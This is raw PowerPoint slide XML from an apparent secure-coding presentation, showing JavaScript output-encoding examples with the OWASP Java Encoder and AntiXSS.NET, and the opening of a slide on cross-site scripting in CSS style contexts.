                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;script type="text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>javascript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> = "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>alert(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28"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JS Hex Escaping</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7091102" y="536804"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Oval 18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>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18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6714321" y="1019404"/>
              <a:ext cx="1716797" cy="615553"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="4000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="812938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
              <a:t>JavaScript Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1465504"/>
            <a:ext cx="8229052" cy="3531671"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="3531671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25" descr="codewindow.png"/>
            <p:cNvPicPr>
              <a:picLocks/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="3" t="-82" r="3" b="-82"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3913782"/>
              <a:ext cx="8229052" cy="3122668"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4096919"/>
              <a:ext cx="7895852" cy="2769989"/>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spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;button </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>onclick</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>="alert('</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forJavaScript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>alertMsg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>) %&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>');</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="mr-IN" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>click me&lt;/button&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;script type="text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>javascript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> = "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forJavaScript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>alertMsg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>) %&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="mr-IN" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>alert(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>msg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28"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OWASP Java Encoder</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="5302690"/>
            <a:ext cx="8229052" cy="897989"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="897989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 29"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5" b="82815"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="548640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="266740"/>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600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encoder.JavaScriptEncode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>alertMsg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AntiXSS.NET</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7091102" y="536804"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Oval 18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>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18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6714321" y="1019404"/>
              <a:ext cx="1716797" cy="615553"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="4000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1406562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CSS Value Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38835844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836"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS in the Style Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196235"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider this example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>viewDocument?background</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>brown</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="6180987"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569275" y="2084556"/>
            <a:ext cx="618372" cy="2751423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>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gn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
